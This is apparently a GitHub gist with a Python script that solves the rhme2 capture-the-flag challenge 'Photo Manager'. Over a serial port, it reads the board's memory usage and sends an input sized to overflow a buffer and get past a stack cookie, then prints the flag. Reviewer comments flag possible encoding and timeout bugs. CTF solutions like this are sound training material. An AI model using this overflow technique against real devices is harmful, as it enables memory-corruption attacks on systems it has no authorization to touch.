Last active
February 17, 2024 18:16
Fast exploit for the rhme2 CTF challenge Photo Manager, written in Python 3. Breaks a stack cookie.
#!/usr/bin/env python3 | |
import sys
import time

import serial
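# Open the serial link to the board; every later step uses this handle.
try:
    arduino = serial.Serial('/dev/ttyUSB0', 19200, timeout=0.1)
except serial.SerialException:
    # Stop here. Carrying on without the port would only fail later with a
    # NameError on `arduino`, which hides the real cause. Catching the
    # specific exception also keeps Ctrl-C and programming errors visible.
    print('Port not found')
    sys.exit(1)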
def read_until(until):
    """Read lines from the serial port until the text *until* has been seen.

    Returns everything accumulated so far, marker included. Each line is
    appended as ``str()`` of the bytes object that ``readline()`` returns,
    so the accumulated text is a run of ``b'...'`` reprs, not decoded text.

    NOTE(review): there is no overall deadline. The port is opened with a
    read timeout, so a marker that never arrives makes this loop forever.
    """
    received = ''
    while True:
        if until in received:
            return received
        received += str(arduino.readline())
# Ask the memory-management menu entry how much memory is currently in use.
read_until('[2] Memory management')
arduino.write('2\r'.encode())
# read_until() returns concatenated bytes reprs, so the field index below
# depends on that exact text layout.
memory_report = read_until('Memory space used:')
used_memory = memory_report.split(' ')[7]

# Back at the main menu, choose entry 1 and wait for its input prompt.
read_until('[2] Memory management')
arduino.write('1\r'.encode())
read_until('[A-Z/a-z/0-9]')

# Send the oversized input: (4096 - used - 8) filler characters, then one
# character whose code point is 4088 - used, then a raw 0xff byte and CR.
# NOTE(review): the firmware is not shown here. Per the gist description
# this input overruns a buffer far enough to defeat the stack cookie, so
# the defensive takeaway is that the target should reject input longer
# than the space it has left. The meaning of 4096 and of the trailing
# bytes is presumably tied to the board's memory layout; confirm.
# NOTE(review): encode() uses UTF-8, so a code point above 127 is sent as
# two bytes, and a negative value makes chr() raise ValueError.
used = int(used_memory)
filler_len = 4096 - used - 8
payload = 'A' * filler_len + chr(4088 - used)
arduino.write(payload.encode())
arduino.write(b"\xff")
arduino.write('\r'.encode())

print(read_until('[2] Memory management'))
# The flag appears in the output next to the keyword FLAG.
# In my case: FLAG:D1d_y0u_sm4sh_my_stack_bro?